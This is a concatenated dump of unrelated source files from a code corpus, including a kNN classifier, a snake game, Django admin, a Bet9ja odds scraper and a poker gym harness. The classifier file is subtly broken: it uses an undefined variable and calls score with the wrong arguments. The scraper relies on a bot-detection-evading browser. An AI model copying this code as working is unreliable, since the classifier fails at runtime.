return ( self.async.last_data_recv_ts is not None and ((time.time() - self.async.last_data_recv_ts) <= 3) )
def is_connected (self):
return (self.state[0] == self.CONNECTED)
def is_marked_for_disconnect (self):
return self.state[0] == self.MARK_FOR_DISCONNECT
def get_disconnection_cause (self):
return self.state[1]
########## private ################
def __connect (self):
'''
connect to the server (two channels)
'''
# start with the sync channel
self.logger.pre_cmd("Connecting to RPC server on {0}:{1}".format(self.conn_info['server'], self.conn_info['sync_port']))
rc = self.rpc.connect()
if not rc:
return rc
# API sync V2
rc = self.rpc.transmit("api_sync_v2", params = self.api_ver)
self.logger.post_cmd(rc)
if not rc:
# api_sync_v2 is not present in v2.30 and older
if rc.errno() == JsonRpcErrNo.MethodNotSupported:
return RC_ERR('Mismatch between client and server versions')
return rc
# get the API_H and provide it to the RPC channel from now on
self.rpc.api_h = rc.data()['api_h']
# connect async channel
self.logger.pre_cmd("Connecting to publisher server on {0}:{1}".format(self.conn_info['server'], self.conn_info['async_port']))
rc = self.async.connect()
self.logger.post_cmd(rc)
if not rc:
return rc
self.state = (self.CONNECTED, None)
return RC_OK()
| 2.140625 | 2 |
src/Colors/__init__.py | tuantvk/pystrap | 2 | 12794314 | <gh_stars>1-10
# default color
primary = '#007bff'
secondary = '#6c757d'
success = '#28a745'
danger = '#dc3545'
warning = '#ffc107'
info = '#17a2b8'
light = '#f8f9fa'
dark = '#343a40'
white = '#ffffff'
black = '#212529'
# active color
active_primary = '#0069d9'
active_secondary = '#5a6268'
active_success = '#218838'
active_danger = '#c82333'
active_warning = '#e0a800'
active_info = '#138496'
active_light = '#e2e6ea'
active_dark = '#23272b'
active_white = '#ffffff' | 1.078125 | 1 |
classify.py | fedden/TensorFlowSiameseNeuralNetwork | 2 | 12794315 | import numpy as np
from sklearn.neighbors import KNeighborsClassifier
def classify_from_embeddings(model,
train_images,
train_labels,
test_images,
test_labels,
k=5,
distance_metric='mahalanobis',
distance_weighting='distance'):
# Create training embeddings.
train_embeddings = np.array([model.inference(b) for b in train_images])
train_embeddings = train_embeddings.reshape((-1, model.embedding_size))
# Create testing embeddings.
test_embeddings = np.array([model.inference(b) for b in testing_images])
test_embeddings = test_embeddings.reshape((-1, model.embedding_size))
# Train kNN.
classifier = KNeighborsClassifier(n_neighbors=k,
weights=distance_weighting,
algorithm='auto',
metric=distance_metric,
n_jobs=-1)
classifier.fit(train_embeddings, train_labels)
# Get predictions.
test_predictions = classifier.predict(test_embeddings)
# Return accuracy of kNN.
accuracy = classifier.score(test_labels, test_predictions)
return accuracy
| 3.015625 | 3 |
Pythonsnakegame.py | MadJedi/pythonsnakegame | 0 | 12794316 | <reponame>MadJedi/pythonsnakegame<gh_stars>0
from tkinter import Tk, Canvas
import random
# Globals
WIDTH = 800
HEIGHT = 600
SEG_SIZE = 20
IN_GAME = True
# Helper functions
def create_block():
""" Creates an apple to be eaten """
global BLOCK
posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE)
posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE)
BLOCK = c.create_oval(posx, posy,
posx+SEG_SIZE, posy+SEG_SIZE,
fill="red")
def main():
""" Handles game process """
global IN_GAME
if IN_GAME:
s.move()
head_coords = c.coords(s.segments[-1].instance)
x1, y1, x2, y2 = head_coords
# Check for collision with gamefield edges
if x2 > WIDTH or x1 < 0 or y1 < 0 or y2 > HEIGHT:
IN_GAME = False
# Eating apples
elif head_coords == c.coords(BLOCK):
s.add_segment()
c.delete(BLOCK)
create_block()
# Self-eating
else:
for index in range(len(s.segments)-1):
if head_coords == c.coords(s.segments[index].instance):
IN_GAME = False
root.after(100, main)
# Not IN_GAME -> stop game and print message
else:
set_state(restart_text, 'normal')
set_state(game_over_text, 'normal')
class Segment(object):
""" Single snake segment """
def __init__(self, x, y):
self.instance = c.create_rectangle(x, y,
x+SEG_SIZE, y+SEG_SIZE,
fill="white")
class Snake(object):
""" Simple Snake class """
def __init__(self, segments):
self.segments = segments
# possible moves
self.mapping = {"Down": (0, 1), "Right": (1, 0),
"Up": (0, -1), "Left": (-1, 0)}
# initial movement direction
self.vector = self.mapping["Right"]
def move(self):
""" Moves the snake with the specified vector"""
for index in range(len(self.segments)-1):
segment = self.segments[index].instance
x1, y1, x2, y2 = c.coords(self.segments[index+1].instance)
c.coords(segment, x1, y1, x2, y2)
x1, y1, x2, y2 = c.coords(self.segments[-2].instance)
c.coords(self.segments[-1].instance,
x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE,
x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE)
def add_segment(self):
""" Adds segment to the snake """
last_seg = c.coords(self.segments[0].instance)
x = last_seg[2] - SEG_SIZE
y = last_seg[3] - SEG_SIZE
self.segments.insert(0, Segment(x, y))
def change_direction(self, event):
""" Changes direction of snake """
if event.keysym in self.mapping:
self.vector = self.mapping[event.keysym]
def reset_snake(self):
for segment in self.segments:
c.delete(segment.instance)
def set_state(item, state):
c.itemconfigure(item, state=state)
def clicked(event):
global IN_GAME
s.reset_snake()
IN_GAME = True
c.delete(BLOCK)
c.itemconfigure(restart_text, state='hidden')
c.itemconfigure(game_over_text, state='hidden')
start_game()
def start_game():
global s
create_block()
s = create_snake()
# Reaction on keypress
c.bind("<KeyPress>", s.change_direction)
main()
def create_snake():
# creating segments and snake
segments = [Segment(SEG_SIZE, SEG_SIZE),
Segment(SEG_SIZE*2, SEG_SIZE),
Segment(SEG_SIZE*3, SEG_SIZE)]
return Snake(segments)
# Setting up window
root = Tk()
root.title("PythonicWay Snake")
c = Canvas(root, width=WIDTH, height=HEIGHT, bg="#003300")
c.grid()
# catch keypressing
c.focus_set()
game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text="GAME OVER!",
font='Arial 20', fill='red',
state='hidden')
restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3,
font='Arial 30',
fill='white',
text="Click here to restart",
state='hidden')
c.tag_bind(restart_text, "<Button-1>", clicked)
start_game()
root.mainloop()
| 3.65625 | 4 |
botbot/apps/bots/admin.py | Reception123/IRCLogBot | 5 | 12794317 | <filename>botbot/apps/bots/admin.py
"""Django admin configuration for the bot objects.
"""
import redis
from django import forms
from django.conf import settings
from django.contrib import admin
from django.forms.models import BaseInlineFormSet
from . import models
class PluginFormset(BaseInlineFormSet):
def __init__(self, *args, **kwargs):
super(PluginFormset, self).__init__(*args, **kwargs)
class ActivePluginInline(admin.StackedInline):
model = models.Channel.plugins.through
formset = PluginFormset
def get_extra(self, request, obj=None, **kwargs):
return 0
class ChatBotAdmin(admin.ModelAdmin):
exclude = ('connection', 'server_identifier')
list_display = ('__unicode__', 'is_active', 'usage')
list_editable = ('is_active',)
list_filter = ('is_active',)
readonly_fields = ('server_identifier',)
# Disable bulk delete, because it doesn't call delete, so skips REFRESH
actions = None
def usage(self, obj):
return "%d%%" % (
(obj.channel_set.filter(status=models.Channel.ACTIVE).count() / float(obj.max_channels)) * 100)
def botbot_refresh(modeladmin, request, queryset):
"""
Ask daemon to reload configuration
"""
queue = redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL)
queue.lpush('bot', 'REFRESH')
botbot_refresh.short_description = "Reload botbot-bot configuration"
class ChannelForm(forms.ModelForm):
class Meta:
model = models.Channel
exclude = []
def clean_private_slug(self):
return self.cleaned_data['private_slug'] or None
class ChannelAdmin(admin.ModelAdmin):
form = ChannelForm
list_display = ('name', 'chatbot', 'status', 'is_featured', 'created', 'updated')
list_filter = ('status', 'is_featured', 'is_public', 'chatbot')
prepopulated_fields = {
'slug': ('name',)
}
list_editable = ('chatbot','status',)
readonly_fields = ('fingerprint', 'created', 'updated')
search_fields = ('name', 'chatbot__server')
inlines = [ActivePluginInline]
actions = [botbot_refresh]
class PublicChannelApproval(ChannelAdmin):
def has_add_permission(self, request):
return False
def get_queryset(self, request):
qs = super(PublicChannelApproval, self).get_queryset(request)
return qs.filter(status=self.model.ACTIVE, is_public=True)
class PublicChannels(models.Channel):
class Meta:
proxy = True
verbose_name = "Pending Public Channel"
admin.site.register(PublicChannels, PublicChannelApproval)
admin.site.register(models.ChatBot, ChatBotAdmin)
admin.site.register(models.Channel, ChannelAdmin)
admin.site.register(models.UserCount)
| 2.078125 | 2 |
ixmp/tests/reporting/conftest.py | ShaiWinograd/ixmp | 0 | 12794318 | import pint
import pytest
@pytest.fixture(scope="session")
def ureg():
"""Application-wide units registry."""
registry = pint.get_application_registry()
# Used by .compat.ixmp, .compat.pyam
registry.define("USD = [USD]")
registry.define("case = [case]")
yield registry
| 1.9375 | 2 |
mmf/datasets/builders/flickr30k_retrieval/database.py | PlusLabNLP/phrase_grounding | 2 | 12794319 | # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import jsonlines
import torch
import random
import numpy as np
import _pickle as cPickle
class Flickr30kRetrievalDatabase(torch.utils.data.Dataset):
def __init__(self, imdb_path, dataset_type, test_id_file_path, hard_neg_file_path):
super().__init__()
self._dataset_type = dataset_type
self._load_annotations(imdb_path, test_id_file_path, hard_neg_file_path)
self._metadata = {}
@property
def metadata(self):
return self._metadata
@metadata.setter
def metadata(self, x):
self._metadata = x
def _load_annotations(self, imdb_path, test_id_path, hard_neg_file_path):
if self._dataset_type != "train":
self.imgs = []
with jsonlines.open(imdb_path) as reader:
# Build an index which maps image id with a list of caption annotations.
entries = []
imgid2entry = {}
count = 0
remove_ids = []
if test_id_path:
remove_ids = np.load(test_id_path)
remove_ids = [int(x) for x in remove_ids]
for annotation in reader:
image_id = int(annotation["img_path"].split(".")[0])
if self._dataset_type != "train":
self.imgs.append(image_id)
if self._dataset_type == "train" and int(image_id) in remove_ids:
continue
imgid2entry[image_id] = []
for sentences in annotation["sentences"]:
entries.append({"caption": sentences, "image_id": image_id})
imgid2entry[image_id].append(count)
count += 1
self._entries = entries
self.imgid2entry = imgid2entry
self.image_id_list = [*self.imgid2entry]
if self._dataset_type == "train":
with open(hard_neg_file_path, "rb") as f:
image_info = cPickle.load(f)
for key, value in image_info.items():
setattr(self, key, value)
self.train_imgId2pool = {
imageId: i for i, imageId in enumerate(self.train_image_list)
}
self.db_size = len(self._entries)
def __len__(self):
return self.db_size
def __getitem__(self, idx):
entry = self._entries[idx]
if self._dataset_type != "train":
return entry, self.imgs
image_id = entry["image_id"]
while True:
# sample a random image:
img_id2 = random.choice(self.image_id_list)
if img_id2 != image_id:
break
entry2 = self._entries[random.choice(self.imgid2entry[img_id2])]
# random image wrong
while True:
# sample a random image:
img_id3 = random.choice(self.image_id_list)
if img_id3 != image_id:
break
entry3 = self._entries[self.imgid2entry[img_id3][0]]
if self._dataset_type == "train":
# random hard caption.
rand_img_id_pool = self.train_hard_pool[self.train_imgId2pool[image_id]]
pool_img_idx = int(
rand_img_id_pool[np.random.randint(1, len(rand_img_id_pool))]
)
img_id4 = self.train_image_list[pool_img_idx]
else:
while True:
# sample a random image:
img_id4 = random.choice(self.image_id_list)
if img_id4 != image_id:
break
entry4 = self._entries[random.choice(self.imgid2entry[img_id4])]
return [entry, entry2, entry3, entry4]
| 2.125 | 2 |
Algorithms/Divide-and-Conquer/Python/main.py | KumarjitDas/Algorithms | 0 | 12794320 | <filename>Algorithms/Divide-and-Conquer/Python/main.py
from typing import List
def arraysum(array: List[int]) -> int:
""" Get the sum of all the elements in the array.
arraysum
========
The `arraysum` function takes an array and returns the sum of all of its
elements using divide and concuer method.
Parameters
----------
array: List[int]
An array/list of integers
Returns
-------
sum: int
Sum of all the elements in the array
"""
if len(array) == 0: # The base case: if the length of the
return 0 # array is 0 then stop
return array.pop() + arraysum(array) # Divide and conquer: divide the array
# into first element and rest of the
# elements and call itself with them
if __name__ == '__main__':
print(f"{arraysum([1, 2, 3, 4, 5, 6, 7]) = }")
| 4.34375 | 4 |
detokenizefrag.py | aycock/mh | 0 | 12794321 | <reponame>aycock/mh<filename>detokenizefrag.py
# Python < 3
# see LICENSE file for licensing information
# Partial detokenization of LISA assembler fragments found in a binary file.
import sys
TOKENS = {
# reversed by comparing assembly fragments to Mystery House disasm
# later verified against LISA decoder at
# https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp
0xcb: 'jsr',
0xca: 'jmp',
0xac: 'tax',
0xce: 'ldx',
0xcd: 'lda',
0xcf: 'ldy',
0xd2: 'sty',
0xd0: 'sta',
0x96: 'brk',
0xad: 'tay',
0x99: 'clc',
0xd1: 'stx',
0xc0: 'adc',
0xc4: 'cmp', # very likely but not 100% sure about these
0x86: 'bne',
0x87: 'beq',
# directives prepended with '.' to distinguish from assembly instrs
# names updated per LISA decoder at
# https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp
#0xd8: '.dw', # 2-byte word
0xd8: '.adr', # 2-byte word
#0xe4: '.db', # one or more hex bytes
0xe4: '.hex', # one or more hex bytes
0xdf: '.asc', # ASCII string, no terminator
}
def process():
lines = disk.split(chr(0x0d))
for line in lines:
if len(line) == 0:
# skip (XXX but can you have a line of length $d?)
continue
elif line[0] != len(line):
if line[0] < len(line) and line[line[0]] == 0x20:
# seems to happen with labels, kind of
# a two-part line
s = ''.join([ chr(b) for b in line[1:line[0]] ])
print s
line = line[line[0]+1:]
else:
# skip, probably corrupted or not part
# of assembly fragment
print '[...]'
continue
line = line[1:] # lose length byte
# opcode on line?
if line[0] & 0x80:
# opcode token and operand format byte
if line[0] in TOKENS:
print '\t' + TOKENS[line[0]],
else:
print '%02x %02x' % (line[0], line[1]),
line = line[2:]
# rest must be ASCII: operand, comment
s = ''
lastascii = True
for b in line:
if b >= ord(' ') and b < 127:
s += chr(b)
lastascii = True
else:
if lastascii == True and b & 0x80:
# high bit seems to flag the
# end of operand field when
# inline comment follows
s += chr(b & 0x7f)
lastascii = True
else:
s += ' %02x ' % b
lastascii = False
print s
if __name__ == '__main__':
if len(sys.argv) != 2:
print 'Usage" python', sys.argv[0], '<image.dsk>'
exit()
f = open(sys.argv[1], 'rb')
disk = bytearray(f.read())
f.close()
process()
| 2.125 | 2 |
data-processing-scripts/reverse_saved_dict.py | alecokas/BiLatticeRNN-data-processing | 5 | 12794322 | """ Script for generating a reversed dictionary """
import argparse
import numpy as np
import sys
def parse_arguments(args_to_parse):
description = "Load a *.npy archive of a dictionary and swap (reverse) the dictionary keys and values around"
parser = argparse.ArgumentParser(description=description)
general = parser.add_argument_group('General options')
general.add_argument(
'-i', '--input-file', type=str, required=True,
help="The file path to the word vector dictionary into *.npy format"
)
general.add_argument(
'-o', '--output-file', type=str, required=True,
help="The target file to save the reversed dictionary"
)
args = parser.parse_args(args_to_parse)
return args
def main(args):
wordvec = np.load(args.input_file).item()
reversed_wordvec = {str(v): k for k, v in wordvec.items()}
np.save(args.output_file, reversed_wordvec)
if __name__=='__main__':
args = parse_arguments(sys.argv[1:])
main(args)
| 3.796875 | 4 |
swf/responses/__init__.py | nstott/simpleflow | 69 | 12794323 | from .base import Response # NOQA
| 0.988281 | 1 |
bet9ja.py | kennedyC2/Arbitrage | 0 | 12794324 | <gh_stars>0
# Dependencies
# =============================================================================================================
import undetected_chromedriver.v2 as uc
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from bs4 import BeautifulSoup
import time
import json
import re
from pathlib import Path
# Browser Configurations
# =============================================================================================================
BrowserMode = uc.ChromeOptions()
BrowserMode.headless = False
BrowserMode.add_argument('--user-data-dir=./chrome_profile/')
BrowserMode.add_argument("--start-maximized")
Browser = uc.Chrome(options=BrowserMode)
actions = ActionChains(Browser)
# Websites
# =============================================================================================================
bet9ja = "https://sports.bet9ja.com/"
# Functions
# =============================================================================================================
# Bet9ja Menu
def getMenu():
# Object
data = {}
# Initialise Browser
Browser.get(bet9ja)
# Wait
WebDriverWait(Browser, 60).until(
EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item')))
# Activate Menu
Browser.find_elements(By.CLASS_NAME, "accordion-item")[0].click()
Browser.find_element(By.ID,
"left_prematch_sport-1_soccer_labelmore-toggle").click()
# Parse HtmlDoc
soup = BeautifulSoup(Browser.page_source, "html5lib")
# Fetch Menu
for div in soup.select(".accordion > .accordion-item")[0]:
upper = div.select(".accordion-inner > .accordion-item")
for div in upper:
title = div.find("div", "accordion-text").get_text().strip()
id = div.find("div", "accordion-toggle")['id']
data[title] = {}
data[title]['location'] = id
# fetch Submenu and Menu link
for each in data:
l = data[each]['location']
Browser.find_element(By.ID, l).click()
# Parse HtmlDoc
soup = BeautifulSoup(Browser.page_source, "html5lib")
d = soup.find_all('a', 'side-nav-league__link')
e = []
for t in d:
f = {}
f['title'] = t['title']
f['id'] = re.sub('[a-zA-Z_,]', '', t['id'])
e.append(f)
data[each]['submenu'] = e
# Save as JSON
with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile:
json.dump(data, outfile, indent=4)
Browser.quit()
# Bet9ja links
def getLinks_Bet9ja():
# web prefix
p = bet9ja + 'competition/soccer/'
# link Object
links = {}
# fetch menu
with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file:
global data
data = json.load(json_file)
for e in data:
for a in data[e]['submenu']:
u = e.lower().replace(',', '').replace(' ', '') + '/'
v = a['title'].lower().replace(',', '').replace(' ', '') + '/'
w = a['id'].lower()[1:]
# full link
fl = p + u + v + w
# Gather links
links[a['title']] = fl
# Save links
with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile:
json.dump(links, outfile, indent=4)
Browser.quit()
# Bet9ja Odds
# ======================================================================================
# DNB
def DNB():
# Odds
odds = []
# fetch links
with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file:
global data
data = json.load(json_file)
for e in data:
# Initiate Browser
Browser.get(data[e])
# Wait 5 seconds
time.sleep(5)
# Index of target
index = -1
# Get index
soup = BeautifulSoup(Browser.page_source, 'html5lib')
box = len(soup.find_all('td', 'grid-table__td'))
for i in range(box):
if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB':
index = i
break
# Activate DNB
if index > -1:
Browser.find_elements(By.CLASS_NAME,
'grid-table__td')[index].click()
# Wait 5 seconds
time.sleep(5)
# Scroll the page
height = int(Browser.execute_script(
'return document.body.scrollHeight'))
for i in range(1, height, 10):
Browser.execute_script("window.scrollTo(0, {});".format(i))
# Wait 5 seconds
time.sleep(5)
# Parse HtmlDoc
soup = BeautifulSoup(Browser.page_source, "html5lib")
elem = soup.select('.sports-table > .table-f')
for each in elem:
# Compile
info = {}
home_team = each.find(
'div', 'sports-table__home').get_text().strip()
away_team = each.find(
'div', 'sports-table__away').get_text().strip()
info['category'] = e
info['match'] = home_team + ' vs ' + away_team
info['time'] = each.find('span').get_text().strip()
info['home'] = each.find_all(
'li', 'sports-table__odds-item')[0].get_text().strip() or 0
info['away'] = each.find_all(
'li', 'sports-table__odds-item')[1].get_text().strip() or 0
# Upload
odds.append(info)
else:
pass
continue
with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile:
json.dump(odds, outfile, indent=4)
Browser.quit()
# GGNG
def GGNG():
# Odds
odds = []
# fetch links
with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file:
global data
data = json.load(json_file)
for e in data:
# Initiate Browser
Browser.get(data[e])
# Wait 5 seconds
time.sleep(5)
# Index of target
index = -1
# Get index
soup = BeautifulSoup(Browser.page_source, 'html5lib')
box = len(soup.find_all('td', 'grid-table__td'))
for i in range(box):
if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG':
index = i
break
# Activate GGNG
if index > -1:
Browser.find_elements(By.CLASS_NAME,
'grid-table__td')[index].click()
# Wait 5 seconds
time.sleep(5)
# Scroll the page
height = int(Browser.execute_script(
'return document.body.scrollHeight'))
for i in range(1, height, 10):
Browser.execute_script("window.scrollTo(0, {});".format(i))
# Wait 5 seconds
time.sleep(5)
# Parse HtmlDoc
soup = BeautifulSoup(Browser.page_source, "html5lib")
elem = soup.select('.sports-table > .table-f')
for each in elem:
# Compile
info = {}
home_team = each.find(
'div', 'sports-table__home').get_text().strip()
away_team = each.find(
'div', 'sports-table__away').get_text().strip()
info['category'] = e
info['match'] = home_team + ' vs ' + away_team
info['time'] = each.find('span').get_text().strip()
info['GG'] = each.find_all(
'li', 'sports-table__odds-item')[0].get_text().strip() or 0
info['NG'] = each.find_all(
'li', 'sports-table__odds-item')[1].get_text().strip() or 0
# Upload
odds.append(info)
else:
pass
continue
with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile:
json.dump(odds, outfile, indent=4)
Browser.quit()
# Double Chance and Single Chance
def DS_chance():
# Odds
s_odds = []
d_odds = []
# fetch links
with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file:
global data
data = json.load(json_file)
for e in data:
# Initiate Browser
Browser.get(data[e])
# Wait 5 seconds
time.sleep(5)
# Scroll the page
height = int(Browser.execute_script(
'return document.body.scrollHeight'))
for i in range(1, height, 10):
Browser.execute_script("window.scrollTo(0, {});".format(i))
# # Wait 5 seconds
time.sleep(5)
# Parse HtmlDoc
soup = BeautifulSoup(Browser.page_source, "html5lib")
elem = soup.select('.sports-table > .table-f')
for each in elem:
# Compile
info_1 = {}
info_2 = {}
home_team = each.find(
'div', 'sports-table__home').get_text().strip()
away_team = each.find(
'div', 'sports-table__away').get_text().strip()
info_1['category'] = e
info_2['category'] = e
info_1['match'] = home_team + ' vs ' + away_team
info_2['match'] = home_team + ' vs ' + away_team
info_1['time'] = each.find('span').get_text().strip()
info_2['time'] = each.find('span').get_text().strip()
info_1['home'] = each.find_all(
'li', 'sports-table__odds-item')[0].get_text().strip() or 0
info_1['away'] = each.find_all(
'li', 'sports-table__odds-item')[2].get_text().strip() or 0
info_2['1X'] = each.find_all(
'li', 'sports-table__odds-item')[3].get_text().strip() or 0
info_2['2X'] = each.find_all(
'li', 'sports-table__odds-item')[5].get_text().strip() or 0
# Upload
s_odds.append(info_1)
d_odds.append(info_2)
with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile:
json.dump(s_odds, outfile, indent=4)
with open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile:
json.dump(d_odds, outfile, indent=4)
Browser.quit()
# getMenu()
# getLinks_Bet9ja()
DS_chance()
| 1.992188 | 2 |
src/hermesIII/src/xbox_360.py | hmalatini/hermes3 | 0 | 12794325 | #!/usr/bin/env python
import rospy
from geometry_msgs.msg import Twist
from sensor_msgs.msg import Joy
toggle = False
def callback(data):
global toggle
twist = Twist()
twist.linear.x = 1.5*data.axes[1]
twist.linear.y = -1.5*data.axes[0]
twist.angular.z = 1.5*data.axes[3]
if(data.buttons[4] == 1):
toggle = True
pub.publish(twist)
elif(toggle == True):
twist.linear.x = 0
twist.linear.y = 0
twist.angular.z = 0
pub.publish(twist)
toggle = False
# Intializes everything
def start():
# publishing to "turtle1/cmd_vel" to control turtle1
global pub
pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10)
# subscribed to joystick inputs on topic "joy"
rospy.Subscriber("joy", Joy, callback)
# starts the node
rospy.init_node('Xbox360Joy')
rospy.spin()
if __name__ == '__main__':
start()
| 2.71875 | 3 |
scripts/print_trace.py | master-coro/gantt-trampoline | 4 | 12794326 | <reponame>master-coro/gantt-trampoline
import sys
from os import path
sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )
from lib.Tasks import TraceGenerator
import argparse
parser = argparse.ArgumentParser(description="Print trace from a Trampoline application.")
parser.add_argument('--trace_path', type=str, default='data/trace.json', help="Register the path to the trace json file")
parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help="Register the path to the tpl static info json file")
args = parser.parse_args()
generator = TraceGenerator(args.tpl_path, args.trace_path)
generator.printTrace() | 2.40625 | 2 |
sdk/python/pulumi_aws/route53/zone_association.py | Charliekenney23/pulumi-aws | 0 | 12794327 | <reponame>Charliekenney23/pulumi-aws
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from .. import utilities, tables
class ZoneAssociation(pulumi.CustomResource):
vpc_id: pulumi.Output[str]
"""
The VPC to associate with the private hosted zone.
"""
vpc_region: pulumi.Output[str]
"""
The VPC's region. Defaults to the region of the AWS provider.
"""
zone_id: pulumi.Output[str]
"""
The private hosted zone to associate.
"""
def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None):
"""
Manages a Route53 Hosted Zone VPC association. VPC associations can only be made on private zones.
> **NOTE:** Unless explicit association ordering is required (e.g. a separate cross-account association authorization), usage of this resource is not recommended. Use the `vpc` configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead.
> **NOTE:** Terraform provides both this standalone Zone VPC Association resource and exclusive VPC associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this time, you cannot use those in-line VPC associations in conjunction with this resource and the same zone ID otherwise it will cause a perpetual difference in plan output. You can optionally use the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource to manage additional associations via this resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] vpc_id: The VPC to associate with the private hosted zone.
:param pulumi.Input[str] vpc_region: The VPC's region. Defaults to the region of the AWS provider.
:param pulumi.Input[str] zone_id: The private hosted zone to associate.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if not resource_name:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(resource_name, str):
raise TypeError('Expected resource name to be a string')
if opts and not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
if vpc_id is None:
raise TypeError("Missing required property 'vpc_id'")
__props__['vpc_id'] = vpc_id
__props__['vpc_region'] = vpc_region
if zone_id is None:
raise TypeError("Missing required property 'zone_id'")
__props__['zone_id'] = zone_id
super(ZoneAssociation, __self__).__init__(
'aws:route53/zoneAssociation:ZoneAssociation',
resource_name,
__props__,
opts)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 1.875 | 2 |
codecast/0/dwpage.py | wsricardo/makvincis | 0 | 12794328 | <gh_stars>0
# downoad web page
import urllib.request as request
url = "https://en.wikipedia.org/wiki/Main_Page"
data = request.urlopen(url).read()
print(data.decode("utf8"))
# Save html file
with open("data.html","w") as fl:
fl.write(data.decode("utf8"))
print("\n\nFinishh")
print("File saved with name (current directory): data.html\n")
| 3.28125 | 3 |
dl/gym_test.py | Nemandza82/g5-poker-bot | 4 | 12794329 | import time
from load_gym import load_gym
import action_helpers as ah
import dl_model_1 as m1
def append_winnings(all_states, all_winnings, winnings):
while len(all_winnings) < len(all_states):
id = len(all_winnings)
player_id = all_states[id].player_to_act
all_winnings.append(winnings[player_id])
def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play):
state = gym.startHand()
all_states = []
all_actions = []
all_winnings = []
hand_saldo = []
while state.status != "hand_finished":
if state.player_to_act == 0:
[action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0)
else:
[action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1)
is_fake_action = False
# In case of fold we can continue playing...
if (action == ah.ACTION_FOLD[0]) and what_if_play:
print("Player:", state.player_to_act, "wanted to fold - randomizing action ******")
winn = [0, 0]
winn[state.player_to_act] = 0
winn[state.other_player_ind] = state.pot_size
print("Winnings:", winn)
append_winnings(all_states, all_winnings, winn)
if len(hand_saldo) == 0:
hand_saldo = [0, 0]
hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size
hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act]
print("Hand saldo at the moment of first fold:", hand_saldo)
# randomize new action and continue playing...
[action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True)
is_fake_action = True
if state.player_to_act == 0:
all_states.append(state)
all_actions.append(action_ind)
print("Calculated action:", action, ammount)
state = gym.act(action, ammount, is_fake_action)
append_winnings(all_states, all_winnings, state.winnings)
print("All winings:", all_winnings)
if len(hand_saldo) == 0:
hand_saldo = [state.saldo[0], state.saldo[1]]
print("Taking state saldo ----")
print("Final hand saldo:", [state.saldo[0], state.saldo[1]])
print("Returned hand saldo:", hand_saldo)
return all_states, all_actions, all_winnings, hand_saldo
def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play):
all_states = []
all_actions = []
all_winnings = []
total_saldo = [0, 0]
for i in range(num_hands):
print("")
print("Hand: ", i)
states, actions, winnings, saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play)
total_saldo[0] += saldo[0]
total_saldo[1] += saldo[1]
print("Avg saldo per hand:", round(total_saldo[0] / (i + 1), 2), ",", round(total_saldo[1] / (i + 1), 2))
for st in states:
all_states.append(st)
for act in actions:
all_actions.append(act)
for winn in winnings:
all_winnings.append(winn)
total_saldo[0] /= num_hands
total_saldo[1] /= num_hands
print("")
print("Bot 0 score: ", total_saldo[0], "per hand")
print("Bot 1 score: ", total_saldo[1], "per hand")
print("")
print("Colected ", len(all_states), " data pairs for training.")
